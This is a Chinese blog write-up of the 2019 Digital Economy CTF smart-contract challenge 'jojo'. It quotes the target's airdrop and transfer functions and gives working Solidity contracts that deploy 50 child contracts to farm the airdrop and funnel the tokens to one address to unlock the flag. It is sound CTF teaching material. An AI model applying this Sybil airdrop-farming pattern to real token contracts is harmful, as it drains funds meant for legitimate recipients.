Fork me on GitHub
pikachu's Blog

数字经济2019 jojo

前言

  • 需要逆向
  • 满足 require 即可
1
2
3
4
function payforflag(string b64email) public {
require(balanceOf[msg.sender] >= 100000);
emit SendFlag(b64email);
}
  • gift 空投函数
1
2
3
4
5
function gift() public {
assert(gift[msg.sender]==0);
balanceOf[msg.sender]+=100;
gift[msg.sender]=1;
}
  • 转账函数
1
2
3
4
5
function transfer(address to,uint value) public {
assert(balanceOf[msg.sender] >= value);
balanceOf[msg.sender]-=value;
balanceOf[to]+=value;
}
  • 转账函数无法整型溢出,所以需要另想办法
  • 薅羊毛攻击:通过建立多个自合约领取空投,然后转账给固定账户即可完成攻击 payforflag
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
contract hack {
address instance_address = 0xd86ed76112295a07c675974995b9805912282eb3;
jojo target = jojo(instance_address);

function hack1(string b64email) public {
target.payforflag(b64email);
}
}

contract father {
function attack() public {
for (uint i=0; i<50; i++)
{
son ason = new son();
}
}
}

contract son {
constructor() public{
jojo tmp = jojo(0xd86ed76112295a07c675974995b9805912282eb3);
tmp.gift();
tmp.transfer(0xafFE1Eeea46Ec23a87C7894d90Aa714552468cAF,100);
}
}
---------------- The End ----------------
谢谢大爷~

Author:pikachu
Link:https://hitcxy.com/2019/jojo/
Contact:hitcxy@hotmail.com
本文基于 知识共享署名-相同方式共享 4.0 国际许可协议发布
转载请注明出处,谢谢!